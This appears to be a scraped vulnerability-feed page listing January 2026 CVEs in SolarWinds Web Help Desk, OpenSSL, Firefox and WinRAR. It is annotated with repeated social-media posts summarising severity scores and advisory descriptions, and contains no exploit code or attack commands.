CVE-2025-40553
(9.8 CRITICAL)

EPSS: 0.65%

updated 2026-01-29T16:31:35.700000

6 posts

SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

DarkWebInformer at 2026-01-29T18:10:38.923Z ##

‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554

CVSS: All 9.8
CVEs Published: January 28th, 2026

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

Advisories:

nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson at 2026-01-29T17:54:31.001Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-01-29T18:10:38.000Z ##

‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554

CVSS: All 9.8
CVEs Published: January 28th, 2026

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

Advisories:

nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson@infosec.exchange at 2026-01-29T17:54:31.000Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

thehackerwire@mastodon.social at 2026-01-28T22:44:56.000Z ##

SolarWinds has just announced four high-severity vulnerabilities in its Web Help Desk (WHD) software that could lead to full system takeover.

These flaws include unauthenticated Remote Code Execution (RCE) via insecure deserialization and multiple Authentication Bypasses, allowing attackers to execute protected methods without any credentials.

CVE-2025-40551 & CVE-2025-40553 (Unauthenticated RCE)
CVE-2025-40552 & CVE-2025-40554 (Auth Bypass)

thehackerwire.com/solarwinds-p

##

thehackerwire@mastodon.social at 2026-01-28T10:14:56.000Z ##

🔴 CVE-2025-40553 - Critical (9.8)

SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without au...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-40552
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-01-29T16:31:35.700000

6 posts

SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

DarkWebInformer at 2026-01-29T18:10:38.923Z ##

‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554

CVSS: All 9.8
CVEs Published: January 28th, 2026

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

Advisories:

nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson at 2026-01-29T17:54:31.001Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-01-29T18:10:38.000Z ##

‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554

CVSS: All 9.8
CVEs Published: January 28th, 2026

CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.

Advisories:

nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2
nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson@infosec.exchange at 2026-01-29T17:54:31.000Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

thehackerwire@mastodon.social at 2026-01-28T22:44:56.000Z ##

SolarWinds has just announced four high-severity vulnerabilities in its Web Help Desk (WHD) software that could lead to full system takeover.

These flaws include unauthenticated Remote Code Execution (RCE) via insecure deserialization and multiple Authentication Bypasses, allowing attackers to execute protected methods without any credentials.

CVE-2025-40551 & CVE-2025-40553 (Unauthenticated RCE)
CVE-2025-40552 & CVE-2025-40554 (Auth Bypass)

thehackerwire.com/solarwinds-p

##

thehackerwire@mastodon.social at 2026-01-28T10:14:46.000Z ##

🔴 CVE-2025-40552 - Critical (9.8)

SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69420
(7.5 HIGH)

EPSS: 0.07%

updated 2026-01-29T16:31:35.700000

2 posts

Issue summary: A type confusion vulnerability exists in the TimeStamp Response verification code where an ASN1_TYPE union member is accessed without first validating the type, causing an invalid or NULL pointer dereference when processing a malformed TimeStamp Response file. Impact summary: An application calling TS_RESP_verify_response() with a malformed TimeStamp Response can be caused to deref

thehackerwire@mastodon.social at 2026-01-29T02:12:08.000Z ##

🟠 CVE-2025-69420 - High (7.5)

Issue summary: A type confusion vulnerability exists in the TimeStamp Response
verification code where an ASN1_TYPE union member is accessed without first
validating the type, causing an invalid or NULL pointer dereference when
processing a malfor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2026-24868
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:35.700000

1 posts

Mitigation bypass in the Privacy: Anti-Tracking component. This vulnerability affects Firefox < 147.0.2.

thehackerwire@mastodon.social at 2026-01-29T02:11:59.000Z ##

🟠 CVE-2026-24868 - High (7.5)

Mitigation bypass in the Privacy: Anti-Tracking component. This vulnerability affects Firefox &lt; 147.0.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69418
(4.0 MEDIUM)

EPSS: 0.02%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: When using the low-level OCB API directly with AES-NI or<br>other hardware-accelerated code paths, inputs whose length is not a multiple<br>of 16 bytes can leave the final partial block unencrypted and unauthenticated.<br><br>Impact summary: The trailing 1-15 bytes of a message may be exposed in<br>cleartext on encryption and are not covered by the authentication tag,<br>allowing an

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2025-68160
(4.7 MEDIUM)

EPSS: 0.03%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: Writing large, newline-free data into a BIO chain using the line-buffering filter where the next BIO performs short writes can trigger a heap-based out-of-bounds write. Impact summary: This out-of-bounds write can cause memory corruption which typically results in a crash, leading to Denial of Service for an application. The line-buffering BIO filter (BIO_f_linebuffer) is not used

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2025-15469
(5.5 MEDIUM)

EPSS: 0.01%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: The 'openssl dgst' command-line tool silently truncates input data to 16MB when using one-shot signing algorithms and reports success instead of an error. Impact summary: A user signing or verifying files larger than 16MB with one-shot algorithms (such as Ed25519, Ed448, or ML-DSA) may believe the entire file is authenticated while trailing data beyond 16MB remains unauthenticated.

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2025-15468
(5.9 MEDIUM)

EPSS: 0.02%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: If an application using the SSL_CIPHER_find() function in a QUIC protocol client or server receives an unknown cipher suite from the peer, a NULL dereference occurs. Impact summary: A NULL pointer dereference leads to abnormal termination of the running process causing Denial of Service. Some applications call SSL_CIPHER_find() from the client_hello_cb callback on the cipher ID re

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2025-66199
(5.9 MEDIUM)

EPSS: 0.02%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: A TLS 1.3 connection using certificate compression can be forced to allocate a large buffer before decompression without checking against the configured certificate size limit. Impact summary: An attacker can cause per-connection memory allocations of up to approximately 22 MiB and extra CPU work, potentially leading to service degradation or resource exhaustion (Denial of Service)

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2025-11187
(6.1 MEDIUM)

EPSS: 0.02%

updated 2026-01-29T16:31:35.700000

1 posts

Issue summary: PBMAC1 parameters in PKCS#12 files are missing validation which can trigger a stack-based buffer overflow, invalid pointer or NULL pointer dereference during MAC verification. Impact summary: The stack buffer overflow or NULL pointer dereference may cause a crash leading to Denial of Service for an application that parses untrusted PKCS#12 files. The buffer overflow may also potent

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

